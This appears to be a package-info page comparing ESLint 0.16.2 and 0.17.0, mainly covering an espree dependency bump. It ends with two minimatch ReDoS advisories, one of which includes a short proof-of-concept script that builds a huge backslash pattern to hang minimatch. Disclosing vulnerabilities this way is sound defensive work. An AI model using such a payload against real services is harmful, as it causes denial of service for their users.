ESLint 0.17.0 marks a subtle yet noteworthy progression from version 0.16.2 in the popular JavaScript linting tool. At its core, ESLint remains an AST-based pattern checker, ensuring code quality and consistency across projects. Both versions share a common set of core dependencies like chalk for terminal styling, debug for logging, and escope for variable analysis. However, the key difference lies in the updated espree dependency. Version 0.17.0 utilizes espree version ^1.12.0, while 0.16.2 uses espree version ^1.11.0. This espree update likely incorporates new ECMAScript syntax support and bug fixes, potentially influencing how ESLint parses and analyzes JavaScript code. Developers upgrading to 0.17.0 should be cognizant of potential rule changes or parsing behavior adjustments stemming from the espree update. The update does not seem to change any of the devDependencies. In terms of development tooling and testing frameworks, both versions maintain identical dependencies, including mocha for testing, sinon for spies and stubs, and browserify for bundling. This suggests a focus on stability and consistency in the development environment between the releases. Ultimately, the update from 0.16.2 to 0.17.0 provides a targeted upgrade, primarily focused on incorporating the latest ECMAScript parsing capabilities through the updated espree dependency. Developers should test their configurations for compatibility.
All the vulnerabilities related to the version 0.17.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.